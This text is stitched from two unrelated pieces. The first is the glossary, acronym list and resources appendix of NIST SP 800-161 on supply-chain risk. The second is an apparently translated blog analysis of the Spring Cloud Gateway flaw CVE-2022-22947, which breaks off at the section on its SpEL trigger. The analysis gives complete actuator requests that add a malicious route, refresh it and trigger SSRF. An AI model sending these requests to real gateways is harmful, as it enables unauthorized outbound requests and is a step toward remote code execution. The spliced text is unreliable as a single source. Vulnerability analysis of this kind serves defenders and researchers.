[NIST SP 800-53 Rev. 5]
The official management decision given by a senior Federal
official or officials to authorize operation of an information
system and to explicitly accept the risk to agency operations
(including mission, functions, image, or reputation), agency
assets, individuals, other organizations, and the Nation based
on the implementation of an agreed-upon set of security and
privacy controls. Authorization also applies to common
controls inherited by agency information systems.
baseline
[CNSSI 4009]
Hardware, software, databases, and relevant documentation for
an information system at a given point in time.
C-SCRM control
A safeguard or countermeasure prescribed for the purpose of reducing or eliminating the likelihood and/or impact/consequences of cybersecurity risks throughout the supply chain.
cybersecurity compromise
in the supply chain
A cybersecurity incident in the supply chain (also known as
compromise) is an occurrence within the supply chain whereby
the confidentiality, integrity, or availability of a system or the
information the system processes, stores, or transmits is
jeopardized. A supply chain incident can occur anywhere
during the life cycle of the system, product or service.
cybersecurity risks
throughout the supply
chain
The potential for harm or compromise arising from suppliers,
their supply chains, their products, or their services.
Cybersecurity risks throughout the supply chain arise from
threats that exploit vulnerabilities or exposures within products
and services traversing the supply chain as well as threats
exploiting vulnerabilities or exposures within the supply chain
itself.
cybersecurity supply chain
risk assessment
A systematic examination of cybersecurity risks throughout
the supply chain, likelihoods of their occurrence, and potential
impacts.
cybersecurity supply chain
risk management
A systematic process for managing exposure to cybersecurity
risks throughout the supply chain and developing appropriate
response strategies, policies, processes, and procedures.
Note: For the purposes of NIST publications SCRM and C-
SCRM refer to the same concept. This is because NIST is
addressing only the cybersecurity aspects of SCRM. Other
organizations may use a different definition of SCRM which is
outside the scope of this publication. This publication does not
address many of the non-cybersecurity aspects of SCRM.
defense-in-breadth
[NIST SP 800-53 Rev. 5]
A planned, systematic set of multidisciplinary activities that
seek to identify, manage, and reduce risk of exploitable
vulnerabilities at every stage of the system, network, or
subcomponent life cycle, including system, network, or
product design and development; manufacturing; packaging;
assembly; system integration; distribution; operations;
maintenance; and retirement.
degradation
A decline in quality or performance; the process by which the
decline is brought about.
developer
[NIST SP 800-53 Rev. 5,
adapted]
A general term that includes developers or manufacturers of
systems, system components, or system services; systems
integrators; suppliers; and product resellers. Development of
systems, components, or services can occur internally within
organizations or through external entities.
element
See supply chain element.
enhanced overlay
An overlay that adds processes, controls, enhancements, and
additional implementation guidance specific to the purpose of
the overlay.
exposure
[ISO Guide 73, adapted]
Extent to which an organization and/or stakeholder is subject to a risk.
external system service
[NIST SP 800-53 Rev. 5]
A system service that is provided by an external service
provider and for which the organization has no direct control
over the implementation of required security and privacy
controls or the assessment of control effectiveness.
external system service
provider
[NIST SP 800-53 Rev. 5]
A provider of external system services to an organization
through a variety of consumer-producer relationships,
including joint ventures, business partnerships, outsourcing
arrangements (i.e., through contracts, interagency agreements,
lines of business arrangements), licensing agreements, and/or
supply chain exchanges.
fit for purpose
[ITIL Service Strategy,
adapted]
Used informally to describe a process, configuration item, IT
service, etc., that is capable of meeting its objectives or service
levels. Being fit for purpose requires suitable design,
implementation, control, and maintenance.
ICT/OT-related service providers
Any organization or individual providing services that may include authorized access to an ICT or OT system.
impact
[NIST SP 800-53 Rev. 5]
The effect on organizational operations, organizational assets,
individuals, other organizations, or the Nation (including the
national security interests of the United States) of a loss of
confidentiality, integrity, or availability of information or a
system.
Information and
Communications
Technology
[ISO/IEC 2382, adapted]
Encompasses the capture, storage, retrieval, processing,
display, representation, presentation, organization,
management, security, transfer, and interchange of data and
information.
information system
[NIST SP 800-53 Rev. 5]
A discrete set of information resources organized for the
collection, processing, maintenance, use, sharing,
dissemination, or disposition of information.
life cycle
[ISO/IEC/IEEE 15288,
adapted]
Evolution of a system, product, service, project, or other
human-made entity.
likelihood
[ISO/IEC 27000]
Chance of something happening.
materiality
1) U.S. Supreme Court in TSC Industries v. Northway, 426 U.S. 438, 449 (1976)
2) Commission Statement and Guidance on Public Company Cybersecurity Disclosures, SECURITIES AND EXCHANGE COMMISSION, 17 CFR Parts 229 and 249 [Release Nos. 33-10459; 34-82746]
1) The standard of materiality articulated by the U.S. Supreme
Court in TSC Industries v. Northway, 426 U.S. 438, 449
(1976) (a fact is material “if there is a substantial likelihood
that a reasonable shareholder would consider it important” in
making an investment decision or if it “would have been
viewed by the reasonable investor as having significantly
altered the ‘total mix’ of information made available” to the
shareholder).
2) The materiality of cybersecurity risks or incidents depends
upon their nature, extent, and potential magnitude, particularly
as they relate to any compromised information or the business
and scope of company operations. The materiality of
cybersecurity risks and incidents also depends on the range of
harm that such incidents could cause. This includes harm to a
company’s reputation, financial performance, and customer
and vendor relationships, as well as the possibility of litigation
or regulatory investigations or actions, including regulatory
actions by state and federal governmental authorities and non-
U.S. authorities.
organizational user
[NIST SP 800-53 Rev. 5, adapted]
An organizational employee or an individual whom the organization deems to have the equivalent status of an employee, including, for example, a contractor, guest researcher, or individual detailed from another organization.
overlay
[NIST SP 800-53 Rev. 5]
A specification of security or privacy controls, control
enhancements, supplemental guidance, and other supporting
information employed during the tailoring process, that is
intended to complement (and further refine) security control
baselines. The overlay specification may be more stringent or
less stringent than the original security control baseline
specification and can be applied to multiple information
systems.
pedigree
The validation of the composition and provenance of
technologies, products, and services is referred to as the
pedigree. For microelectronics, this includes material
composition of components. For software this includes the
composition of open source and proprietary code, including
the version of the component at a given point in time.
Pedigrees increase the assurance that the claims suppliers
assert about the internal composition and provenance of the
products, services, and technologies they provide are valid.
program manager
See system owner.
provenance
[NIST SP 800-53 Rev. 5]
The chronology of the origin, development, ownership,
location, and changes to a system or system component and
associated data. It may also include personnel and processes
used to interact with or make modifications to the system,
component, or associated data.
residual risk
[NIST SP 800-16, adapted]
Portion of risk remaining after controls/countermeasures have
been applied.
risk
[NIST SP 800-39]
A measure of the extent to which an entity is threatened by a
potential circumstance or event, and typically a function of: (i)
the adverse impacts that would arise if the circumstance or
event occurs; and (ii) the likelihood of occurrence.
risk appetite
[NISTIR 8286]
The types and amount of risk, on a broad level, [an
organization] is willing to accept in its pursuit of value.
risk framing
[NIST SP 800-39]
The set of assumptions, constraints, risk tolerances, and
priorities/trade-offs that shape an organization’s approach for
managing risk.
risk management
[NIST SP 800-53 Rev. 5]
The program and supporting processes to manage risk to
agency operations (including mission, functions, image,
reputation), agency assets, individuals, other organizations,
and the Nation, and includes establishing the context for risk-
related activities; assessing risk; responding to risk once
determined; and monitoring risk over time.
risk mitigation
[NIST SP 800-53 Rev. 5]
Prioritizing, evaluating, and implementing the appropriate risk-
reducing controls/countermeasures recommended from the risk
management process.
risk response
[NIST SP 800-53 Rev. 5,
adapted]
Intentional and informed decision and actions to accept, avoid,
mitigate, share, or transfer an identified risk.
risk response plan
A summary of potential consequence(s) of the successful
exploitation of a specific vulnerability or vulnerabilities by a
threat agent, as well as mitigating strategies and C-SCRM
controls.
risk tolerance
[NISTIR 8286, adapted]
The organization’s or stakeholder’s readiness to bear the
remaining risk after responding to or considering the risk in
order to achieve its objectives.
secondary market
An unofficial, unauthorized, or unintended distribution
channel.
security control
[NIST SP 800-53 Rev. 5]
The safeguards or countermeasures prescribed for an
information system or an organization to protect the
confidentiality, integrity, and availability of the system and its
information.
software bill of materials
Exec. Order No. 14028,
supra note 1, § 10(j)
A formal record containing the details and supply chain
relationships of various components used in building software.
Software developers and vendors often create products by
assembling existing open source and commercial software
components. The SBOM enumerates these components in a
product.
supplier
[ISO/IEC/IEEE 15288,
adapted]
[NIST SP 800-53 Rev. 5,
adapted from definition of
“developer”]
Organization or individual that enters into an agreement with
the acquirer or integrator for the supply of a product or service.
This includes all suppliers in the supply chain, developers or
manufacturers of systems, system components, or system
services; systems integrators; suppliers; product resellers; and
third-party partners.
supply chain
[ISO 28001, adapted]
Linked set of resources and processes between and among
multiple levels of organizations, each of which is an acquirer,
that begins with the sourcing of products and services and
extends through their life cycle.
supply chain element
Organizations, entities, or tools employed for the research and
development, design, manufacturing, acquisition, delivery,
integration, operations and maintenance, and/or disposal of
systems and system components.
supply chain risk
information
[FASCA]
Includes, but is not limited to, information that describes or
identifies: (1) Functionality of covered articles, including
access to data and information system privileges; (2)
Information on the user environment where a covered article is
used or installed; (3) The ability of the source to produce and
deliver covered articles as expected (i.e., supply chain
assurance); (4) Foreign control of, or influence over, the
source (e.g., foreign ownership, personal and professional ties
between the source and any foreign entity, legal regime of any
foreign country in which the source is headquartered or
conducts operations); (5) Implications to national security,
homeland security, and/or national critical functions associated
with use of the covered source; (6) Vulnerability of federal
systems, programs, or facilities; (7) Market alternatives to the
covered source; (8) Potential impact or harm caused by the
possible loss, damage, or compromise of a product, material,
or service to an organization’s operations or mission; (9)
Likelihood of a potential impact or harm, or the exploitability
of a system; (10) Security, authenticity, and integrity of
covered articles and their supply and compilation chain; (11)
Capacity to mitigate risks identified; (12) Credibility of and
confidence in other supply chain risk information; (13) Any
other information that would factor into an analysis of the
security, integrity, resilience, quality, trustworthiness, or
authenticity of covered articles or sources; (14) A summary of
the above information and, any other information determined
to be relevant to the determination of supply chain risk.
system
[NIST SP 800-53 Rev. 5,
adapted]
Combination of interacting elements organized to achieve one
or more stated purposes.
Note 1: There are many types of systems. Examples include
general and special-purpose information systems; command,
control, and communication systems; crypto modules; central
processing unit and graphics processor boards; industrial
control systems; flight control systems; weapons, targeting,
and fire control systems; medical devices and treatment
systems; financial, banking, and merchandising transaction
systems; and social networking systems.
Note 2: The interacting elements in the definition of system
include hardware, software, data, humans, processes, facilities,
materials, and naturally occurring physical entities.
Note 3: System-of-systems is included in the definition of
system.
system assurance
[NDIA]
The justified confidence that the system functions as intended
and is free of exploitable vulnerabilities, either intentionally or
unintentionally designed or inserted as part of the system at
any time during the life cycle.
system component
A discrete identifiable information or operational technology
asset that represents a building block of a system and may
include hardware, software, and firmware.
system development life
cycle
[NIST SP 800-34 Rev. 1,
adapted]
The scope of activities associated with a system, encompassing
the system’s initiation, development and acquisition,
implementation, operation and maintenance, and ultimately its
disposal.
system integrator
Those organizations that provide customized services to the
acquirer including for example, custom development, test,
operations, and maintenance.
system owner (or program
manager)
[NIST SP 800-53 Rev. 5]
Official responsible for the overall procurement, development,
integration, modification, or operation and maintenance of a
system.
threat
[NIST SP 800-53 Rev. 5]
Any circumstance or event with the potential to adversely
impact organizational operations, organizational assets,
individuals, other organizations, or the Nation through a
system via unauthorized access, destruction, disclosure,
modification of information, and/or denial of service.
threat analysis
See threat assessment.
threat assessment
[NIST SP 800-53 Rev. 5,
adapted]
Formal description and evaluation of threat to a system or
organization.
threat event
[NIST SP 800-30 Rev. 1]
An event or situation that has the potential for causing
undesirable consequences or impact.
threat event outcome
The effect a threat acting upon a vulnerability has on the
confidentiality, integrity, and/or availability of the
organization’s operations, assets, or individuals.
threat scenario
[NIST SP 800-30 Rev. 1]
A set of discrete threat events, associated with a specific threat
source or multiple threat sources, partially ordered in time.
threat source
[NIST SP 800-53 Rev. 5]
The intent and method targeted at the intentional exploitation
of a vulnerability or a situation and method that may
accidentally trigger a vulnerability.
transparency
See visibility.
trust
[SwA]
The confidence one element has in another, that the second
element will behave as expected.
trustworthiness
[NIST SP 800-53 Rev. 5,
adapted]
The interdependent combination of attributes of a person,
system, or enterprise that provides confidence to others of the
qualifications, capabilities, and reliability of that entity to
perform specific tasks and fulfill assigned responsibilities. The
degree to which a system (including the technology
components that are used to build the system) can be expected
to preserve the confidentiality, integrity, and availability of the
information being processed, stored, or transmitted by the
system across the full range of threats.
validation
[ISO 9000]
Confirmation, through the provision of objective evidence, that
the requirements for a specific intended use or application
have been fulfilled.
Note: The requirements were met.
verification
[CNSSI 4009]
[ISO 9000, adapted]
Confirmation, through the provision of objective evidence, that
specified requirements have been fulfilled.
Note: The intended output is correct.
visibility
[ISO/IEC 27036, adapted]
Amount of information that can be gathered about a supplier,
product, or service and how far through the supply chain this
information can be obtained.
vulnerability
[NIST SP 800-53 Rev. 5]
Weakness in an information system, system security
procedures, internal controls, or implementation that could be
exploited or triggered by a threat source.
vulnerability assessment
[NIST SP 800-53 Rev. 5,
adapted]
Systematic examination of a system or product or supply chain
element to determine the adequacy of security measures,
identify security deficiencies, provide data from which to
predict the effectiveness of proposed security measures, and
confirm the adequacy of such measures after implementation.
APPENDIX I: ACRONYMS
A&A
Assessment and Authorization
AO
Authorizing Official
API
Application Programming Interface
APT
Advanced Persistent Threat
BIA
Business Impact Analysis
BYOD
Bring Your Own Device
CAC
Common Access Card
CAO
Chief Acquisition Officer
CEO
Chief Executive Officer
CFO
Chief Financial Officer
CIO
Chief Information Officer
CISA
Cybersecurity and Infrastructure Security Agency
CISO
Chief Information Security Officer
CISS
Cyber Incident Severity Schema
CLO
Chief Legal Officer
COO
Chief Operating Officer
CPO
Chief Privacy Officer
CRO
Chief Risk Officer
CSO
Chief Security Officer
CTO
Chief Technology Officer
CNSS
Committee on National Security Systems
CNSSI
Committee on National Security Systems Instruction
CONUS
Continental United States
COSO
Committee of Sponsoring Organizations of the Treadway Commission
COTS
Commercial Off-The-Shelf
C-SCRM
Cybersecurity Supply Chain Risk Management
CSF
Cybersecurity Framework
CUI
Controlled Unclassified Information
CVE
Common Vulnerabilities and Exposures
CVSS
Common Vulnerability Scoring System
CWE
Common Weakness Enumeration
DHS
Department of Homeland Security
DMEA
Defense Microelectronics Activity
DoD
Department of Defense
DODI
Department of Defense Instruction
ERM
Enterprise Risk Management
ERP
Enterprise Resource Planning
FAR
Federal Acquisition Regulation
FARM
Frame, Assess, Respond, Monitor
FASC
Federal Acquisition Security Council
FASCA
Federal Acquisition Supply Chain Security Act
FBI
Federal Bureau of Investigation
FedRAMP
Federal Risk and Authorization Management Program
FIPS
Federal Information Processing Standards
FISMA
Federal Information Security Management Act
FITARA
Federal Information Technology Acquisition Reform Act
FOCI
Foreign Ownership, Control or Influence
FSP
Financial Services Cybersecurity Framework Profile
GAO
Government Accountability Office
GIDEP
Government-Industry Data Exchange Program
GOTS
Government Off-The-Shelf
GPS
Global Positioning System
HR
Human Resources
IA
Information Assurance
ICT
Information and Communication Technology
ICT/OT
Information, communications, and operational technology
IDE
Integrated Development Environment
IDS
Intrusion Detection System
IEC
International Electrotechnical Commission
IOT
Internet of Things
IP
Internet Protocol/Intellectual Property
ISA
Information Sharing Agency
ISO/IEC
International Organization for Standardization/International
Electrotechnical Commission
IT
Information Technology
ITIL
Information Technology Infrastructure Library
ITL
Information Technology Laboratory (NIST)
JWICS
Joint Worldwide Intelligence Communications System
KPI
Key Performance Indicators
KRI
Key Risk Indicators
KSA
Knowledge, Skills, and Abilities
MECE
Mutually Exclusive and Collectively Exhaustive
NISPOM
National Industrial Security Program Operating Manual
NIST
National Institute of Standards and Technology
NCCIC
National Cybersecurity and Communications Integration Center
NDI
Non-developmental Items
NDIA
National Defense Industrial Association
NIAP
National Information Assurance Partnership
NICE
National Initiative for Cybersecurity Education
NISTIR
National Institute of Standards and Technology Interagency or Internal
Report
OCONUS
Outside of Continental United States
OEM
Original Equipment Manufacturer
OGC
Office of the General Counsel
OMB
Office of Management and Budget
OPSEC
Operations Security
OSS
Open Source Solutions
OSY
Office of Security
OT
Operational Technology
OTS
Off-The-Shelf
OTTF
Open Group Trusted Technology Forum
O-TTPS
Open Trusted Technology Provider™ Standard
OWASP
Open Web Application Security Project
PACS
Physical Access Control System
PII
Personally Identifiable Information
PIV
Personal Identity Verification
PM
Program Manager
PMO
Program Management Office
POA&M
Plan of Action & Milestones
QA/QC
Quality Assurance/Quality Control
R&D
Research and Development
RFI
Request for Information
RFP
Request for Proposal
RFQ
Request for Quotation
RMF
Risk Management Framework
SAFECode
Software Assurance Forum for Excellence in Code
SBOM
Software Bill of Materials
SCIF
Sensitive Compartmented Information Facility
SCRI
Supply Chain Risk Information
SCRM
Supply Chain Risk Management
SCRSS
Supply Chain Risk Severity Schema
SDLC
System Development Life Cycle
SECURE
Strengthening and Enhancing Cyber-capabilities by Utilizing Risk
Exposure (Technology Act)
SLA
Service-Level Agreement
SME
Subject Matter Expert
SOO
Statement of Objective
SOW
Statement of Work
SP
Special Publication (NIST)
SSP
System Security Plan
SWA
Software Assurance
SWID
Software Identification Tag
TTP
Tactics, Techniques, and Procedures
U.S.
United States (of America)
US CERT
United States Computer Emergency Readiness Team
VDR
Vulnerability Disclosure Report
APPENDIX J: RESOURCES
RELATIONSHIP TO OTHER PROGRAMS AND PUBLICATIONS
This revision to NIST SP 800-161 builds upon concepts described in a number of NIST and
other publications to facilitate integration with the agencies’ existing enterprise-wide activities,
as well as a series of legislative developments following its initial release. These resources are
complementary and help enterprises build risk-based information security programs to protect
their operations and assets against a range of diverse and increasingly sophisticated threats. This
publication will be revised to remain consistent with the NIST SP 800-53 security controls
catalog using an iterative process as the C-SCRM discipline continues to mature.
NIST Publications
This document leverages the latest versions of the publications and programs that guided its
initial development, as well as new publications following its initial release:
• NIST Cybersecurity Framework (CSF) Version 1.1
• FIPS 199, Standards for Security Categorization of Federal Information and Information
Systems, to conduct criticality analysis and scoping C-SCRM activities to high-impact
components or systems [FIPS 199]
• NIST SP 800-30, Rev. 1, Guide for Conducting Risk Assessments, to integrate ICT/OT
SCRM into the risk assessment process [NIST SP 800-30, Rev. 1]
• NIST SP 800-37, Rev. 2, Risk Management Framework for Information Systems and
Organizations: A System Life Cycle Approach for Security and Privacy [NIST SP 800-
37, Rev. 2]
• NIST SP 800-39, Managing Information Security Risk: Organization, Mission, and
Information System View, to integrate ICT/OT SCRM into the risk management levels
and risk management process [NIST SP 800-39]
• NIST SP 800-53, Rev. 5, Security and Privacy Controls for Information Systems and
Organizations, to provide information security controls for enhancing and tailoring to the
C-SCRM context [NIST SP 800-53, Rev. 5]
• NIST SP 800-53B, Control Baselines for Information Systems and Organizations, to
codify control baselines and C-SCRM supplementary guidance [NIST SP 800-53B]
• NIST SP 800-150, Guide to Cyber Threat Information Sharing, to provide guidelines for
establishing and participating in cyber threat information relationships [NIST SP 800-
150]
• NIST SP 800-160 Vol. 1, Systems Security Engineering [NIST SP 800-160 Vol. 1] and
NIST SP 800-160 Vol. 2, Rev. 1, Developing Cyber Resilient Systems: A Systems
Security Engineering Approach [NIST SP 800-160 Vol. 2] for specific guidance on the
security engineering aspects of C-SCRM
• NIST SP 800-171, Rev. 2, Protecting Controlled Unclassified Information in Nonfederal Systems and
Organizations, for recommended security requirements to protect the confidentiality of
CUI [NIST SP 800-171, Rev. 2]
• NIST SP 800-172, Enhanced Security Requirements for Protecting Controlled
Unclassified Information – A Supplement to NIST Special Publication 800-171, for
recommended enhanced security requirements for protecting the confidentiality of CUI
[NIST SP 800-172]
• NIST SP 800-181, Rev. 1, National Initiative for Cybersecurity Education (NICE)
Cybersecurity Workforce Framework, as a means of forming a common lexicon for C-
SCRM workforce topics [NIST SP 800-181, Rev. 1]
• NISTIR 7622, Notional Supply Chain Risk Management Practices for Federal
Information Systems, for background materials in support of applying the special
publication to their specific acquisition processes [NISTIR 7622]
• NISTIR 8179, Criticality Analysis Process Model: Prioritizing Systems and Components,
to guide ratings of supplier criticality [NISTIR 8179]
• NISTIR 8276, Key Practices in Cyber Supply Chain Risk Management: Observations
from Industry, to elucidate recent C-SCRM trends in the private sector [NISTIR 8276]
• NISTIR 8286, Identifying and Estimating Cybersecurity Risk for Enterprise Risk
Management (ERM), to inform the content on integrating C-SCRM into enterprise risk
management [NISTIR 8286]
Regulatory and Legislative Guidance
This document is heavily informed by regulatory and legislative guidance, including:
• Office of Management and Budget (OMB) Circular A-123, Management’s Responsibility
for Internal Control
• Office of Management and Budget (OMB) Circular A-130, Managing Information as a
Strategic Resource
• The Federal Acquisition Supply Chain Security Act (FASCA), Title II of the
Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure
(SECURE) Technology Act of 2018
• Public Law 115–232 § 889, Prohibition on Contracting Certain Telecommunications and
Video Surveillance Services or Equipment
• Federal Register, Vol. 84, No. 156, Prohibition on Contracting for Certain
Telecommunications and Video Surveillance Services or Equipment, August 13, 2019
• FAR Part 4, Subpart 4.20, Prohibition on Contracting for Hardware, Software, and
Services Developed or Provided by Kaspersky Lab
• Government Accountability Office (GAO), Challenges and Policy Considerations Regarding Offshoring and Foreign
Investment Risks, September 2019
• Executive Order 14028, Improving the Nation’s Cybersecurity, May 12, 2021
• Securities and Exchange Commission 17 CFR Parts 229 and 249 [Release Nos. 33-
10459; 34-82746] Commission Statement and Guidance on Public Company
Cybersecurity Disclosures
Other U.S. Government Reports
This document is also informed by additional government reports:
• Government Accountability Office (GAO) Report, Information Technology: Federal
Agencies Need to Take Urgent Action to Manage Supply Chain Risks, December 2020,
GAO-21-171 [GAO]
• Department of Defense and Department of Homeland Security Software Assurance
Acquisition Working Group, Software Assurance in Acquisition: Mitigating Risks to the
Enterprise [SwA]
• National Defense Industrial Association (NDIA), Engineering for System Assurance
[NDIA]
Standards, Guidelines, and Best Practices
Additionally, [NIST SP 800-161] draws inspiration from a number of international standards,
guidelines, and best practice documents, including:
• The Federal Risk and Authorization Management Program (FedRAMP), Securing Cloud
Services For The Federal Government [https://www.fedramp.gov/]
• International Organization for Standardization/International Electrotechnical Commission
(ISO/IEC) 15288 – Systems and software engineering – System Life Cycle Processes
[ISO/IEC 15288]
• ISO/IEC 27036 – Information Technology – Security Techniques – Information Security
for Supplier Relationships [ISO/IEC 27036]
• ISO/IEC 20243 – Information Technology – Open Trusted Technology ProviderTM
Standard (O-TTPS) – Mitigating maliciously tainted and counterfeit products [ISO/IEC
20243]
• ISO/IEC 27000 – Information Technology – Security Techniques – Information Security
Management System – Overview and Vocabulary [ISO/IEC 27000]
• ISO/IEC 27002 – Information Technology – Security Techniques – Code of Practice for
Information Security Controls [ISO/IEC 27002]
• Software Assurance Forum for Excellence in Code (SAFECode) Software Integrity
Framework [SAFECode 2] and Software Integrity Best Practices [SAFECode 1]
• Cyber Risk Institute, Financial Services Cybersecurity Framework Profile Version 1.1
[FSP]
From SSRF to RCE: An Analysis of the Spring Cloud Gateway RCE Vulnerability

0x01 Foreword
This Tuesday (March 1), Spring officially published CVE reports for Spring Cloud Gateway.
Among them, CVE-2022-22947, a Spring Cloud Gateway code injection vulnerability, is rated critical. By Wednesday and Thursday, quite a few friends in the community had already posted analyses and reproductions. Busy with work and writing my thesis, I had not followed up at the time, so over the weekend I set aside some time to reproduce and analyze this vulnerability myself. It turned out to be quite interesting.
0x02 Starting with SSRF
When I saw the exploitation flow of this vulnerability, I had a sense of familiarity, so I went back through Master Chen's knowledge planet and, sure enough, found it: last December, Master Chen brought up an SSRF vulnerability in the actuator gateway, which originally came from wya.
As the author mentioned in that article, the management features provided by the Spring Cloud Gateway actuator can be used to add, delete, and otherwise manipulate routes.
The author therefore used the route-adding feature provided by the actuator and, following the official example (reproduced later in this article), added a route:
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:9000
Connection: close
Content-Type: application/json

{
    "predicates": [
        {
            "name": "Path",
            "args": {
                "_genkey_0": "/new_route/**"
            }
        }
    ],
    "filters": [
        {
            "name": "RewritePath",
            "args": {
                "_genkey_0": "/new_route(?<path>.*)",
                "_genkey_1": "/${path}"
            }
        }
    ],
    "uri": "https://wya.pl",
    "order": 0
}

After performing the refresh operation, the author successfully triggered an SSRF request (an outbound request to https://wya.pl/index.php).
Master Chen also posted a demo environment in his planet: https://github.com/API-Security/APISandbox/blob/main/OASystem/README.md
Let us leave aside for the moment why the payload is written this way. If you are familiar with the CVE-2022-22947 payload, then reading this far you will certainly feel the same sense of familiarity.
Indeed, CVE-2022-22947 is essentially an advanced version of this SSRF, and the principle behind triggering the SSRF is not complicated.
First, use /actuator/gateway/routes/{new route} to specify a URL and add a route for that address:
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Content-Type: application/json

{
    "predicates": [
        {
            "name": "Path",
            "args": {
                "_genkey_0": "/new_route/**"
            }
        }
    ],
    "filters": [
        {
            "name": "RewritePath",
            "args": {
                "_genkey_0": "/new_route(?<path>.*)",
                "_genkey_1": "/${path}"
            }
        }
    ],
    "uri": "https://www.cnpanda.net",
    "order": 0
}

Then refresh so that the route takes effect. Once refreshed, the newly added route is stored as the following route definition:

{
    "predicate": "Paths: [/new_route], match trailing slash: true",
    "route_id": "new_route",
    "filters": [
        "[[RewritePath /new_route(?<path>.*) = /${path}], order = 1]"
    ],
    "uri": "https://www.cnpanda.net",
    "order": 0
}

Finally, simply visiting /new_route/index.php triggers the SSRF vulnerability.
At this point there are two questions. First, why is the payload written this way? Second, what does the complete request flow look like?
Let us start with the first question: why is the payload written this way?
As mentioned earlier, the official Spring Cloud Gateway example looks like this:

{
    "id": "first_route",
    "predicates": [{
        "name": "Path",
        "args": {"_genkey_0":"/first"}
    }],
    "filters": [],
    "uri": "https://www.uri-destination.org",
    "order": 0
}

Comparing this example with the SSRF payload, we can see that the SSRF payload additionally supplies a concrete definition for the filters.
Looking at the payload as a whole, it is in fact nothing more than a dynamic route configuration.
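Putting the pieces together, the reproduction is a three-step request sequence. This is a minimal sketch, assuming a vulnerable gateway listening on 127.0.0.1:8080; the refresh endpoint shown is the standard actuator gateway refresh endpoint:

# 1. Add the malicious route (request body as shown above)
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/json

# 2. Refresh so the new route takes effect
POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:8080

# 3. Trigger the forwarded (SSRF) request
GET /new_route/index.php HTTP/1.1
Host: 127.0.0.1:8080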
In Spring Cloud Gateway, route configuration comes in two forms: static and dynamic. With static configuration, any addition, modification, or deletion of the route configuration and rules held in memory requires a restart to take effect. In real production environments, however, Spring Cloud Gateway is generally the entry point for all traffic, and to keep the system highly available, restarts must be avoided as much as possible. For that reason, dynamic routes are normally what gets used in practice.
There are two ways to configure dynamic routes in Spring Cloud Gateway. The first, and more common, is to rewrite code and implement a set of dynamic routing methods; for example, a walkthrough of exactly such a dynamic route configuration can be found here. The second is the approach used by the SSRF above; since this approach is based on JVM memory, however, any newly added route configuration disappears completely once the service restarts, which is also the principle behind Master P's answer on v2ex.
So the payload follows a fairly fixed format: first define a predicate (predicates) used to match incoming user requests, and then add a built-in or custom filter (filters) to perform additional functional logic.
The payload uses the path rewrite filter (RewritePath); similar filters include the set path filter (SetPath) and the strip URL prefix filter (StripPrefix). For the full list, refer to the diagram of Gateway's built-in filters, as well as the diagram of Gateway's built-in Global Filters. A code sketch of the first, programmatic, approach follows.
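As a rough illustration of what the JSON payload corresponds to in code, here is a sketch of the equivalent route defined with Spring Cloud Gateway's Java DSL. The class and bean names are invented for illustration; this is an assumption-laden sketch, not code from the original post:

import org.springframework.cloud.gateway.route.RouteLocator;
import org.springframework.cloud.gateway.route.builder.RouteLocatorBuilder;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

@Configuration
public class NewRouteConfig {

    // Equivalent of the JSON payload: a Path predicate plus a RewritePath filter
    @Bean
    public RouteLocator newRoute(RouteLocatorBuilder builder) {
        return builder.routes()
                .route("new_route", r -> r
                        .path("/new_route/**")                        // "predicates"
                        .filters(f -> f.rewritePath(
                                "/new_route(?<path>.*)", "/${path}")) // "filters"
                        .uri("https://www.cnpanda.net"))              // "uri"
                .build();
    }
}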
With the first question settled, we can look at the second: what does the complete request flow look like?
As demonstrated above, when the browser sends a request whose root path is /new_route to the address 127.0.0.1:8080, Spring Cloud Gateway forwards the request to the root path of https://www.cnpanda.net/.
For example, if we send a request for /new_route/index.php to 127.0.0.1:8080, Spring Cloud Gateway actually forwards the request to https://www.cnpanda.net/index.php. The official documentation (the Spring Cloud Gateway "How It Works" section) gives a simple description of this flow.
It looks fairly simple, but it is actually much more complicated. I drew a somewhat more detailed diagram to help with understanding.
We first send the request http://127.0.0.1:8080/new_route/index.php from the browser. The browser accepts the request and hands it to Spring Cloud Gateway, which processes it internally: first, the Gateway Handler Mapping module finds the route matching the /new_route/index.php request, then sends it to the Gateway Web Handler module. There the request first enters the globalFilters, and a FilteringWebHandler is created with the globalFilters (NettyWriteResponseFilter, ForwardPathFilter, RouteToRequestUrlFilter, LoadBalancerClientFilter, AdaptCachedBodyGlobalFilter, WebsocketRoutingFilter, NettyRoutingFilter, ForwardRoutingFilter) as constructor arguments.
Inside NettyRoutingFilter, the intermediate state of our request can be observed.
FilteringWebHandler then runs the filter chain specific to the request: all of the pre-filter logic executes first, then the proxied request is made to the Proxied Service. After the proxied request completes, the Proxied Service returns control to the Gateway Web Handler module to execute the post-filter logic, and finally NettyWriteResponseFilter returns the response content to us. For the response path, refer to the source-code analysis "Spring-Cloud-Gateway 源码解析 —— 过滤器 (4.7) 之 NettyRoutingFilter".
With that, one complete SSRF request/response cycle is formed.
In fact, this kind of SSRF is a "by-product" of Spring Cloud Gateway's own functionality, similar to the SQL injection in the phpMyAdmin backend.
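To make the pre/post filter split concrete, here is a minimal sketch of a custom global filter. The class name and log output are invented for illustration; they are not part of Gateway itself:

import org.springframework.cloud.gateway.filter.GatewayFilterChain;
import org.springframework.cloud.gateway.filter.GlobalFilter;
import org.springframework.core.Ordered;
import org.springframework.stereotype.Component;
import org.springframework.web.server.ServerWebExchange;
import reactor.core.publisher.Mono;

@Component
public class TimingGlobalFilter implements GlobalFilter, Ordered {

    @Override
    public Mono<Void> filter(ServerWebExchange exchange, GatewayFilterChain chain) {
        // "Pre" logic: runs before the request is proxied downstream
        long start = System.currentTimeMillis();
        return chain.filter(exchange)
                // "Post" logic: runs after the proxied response comes back
                .then(Mono.fromRunnable(() ->
                        System.out.println("Proxied " + exchange.getRequest().getURI()
                                + " in " + (System.currentTimeMillis() - start) + " ms")));
    }

    @Override
    public int getOrder() {
        return Ordered.LOWEST_PRECEDENCE;
    }
}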
0x03 Analyzing CVE-2022-22947
If you read the previous section carefully, you probably already have a deeper understanding of this vulnerability.
The trigger point of the vulnerability is our old friend, the SpEL expression.
